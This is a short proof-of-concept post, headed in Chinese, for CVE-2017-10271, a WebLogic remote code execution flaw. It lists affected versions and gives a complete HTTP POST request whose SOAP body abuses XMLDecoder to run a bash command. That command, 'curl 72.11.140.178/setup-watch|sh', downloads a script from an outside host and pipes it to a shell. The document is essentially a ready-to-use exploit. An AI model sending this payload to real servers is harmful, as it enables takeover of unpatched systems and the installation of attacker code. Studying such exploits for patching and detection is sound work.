【POC】CVE-2017-10271 Weblogic_RCE

受影响版本:
Oracle Weblogic Server 10.3.6.0
Oracle Weblogic Server 12.2.1.2
Oracle Weblogic Server 12.2.1.1
Oracle Weblogic Server 12.1.3.0

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.222.143:7001
Accept-Encoding: identity
Content-Length: 688
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0
Content-Type: text/xml
X-Forwarded-For: 72.11.140.178

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>curl 72.11.140.178/setup-watch|sh</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>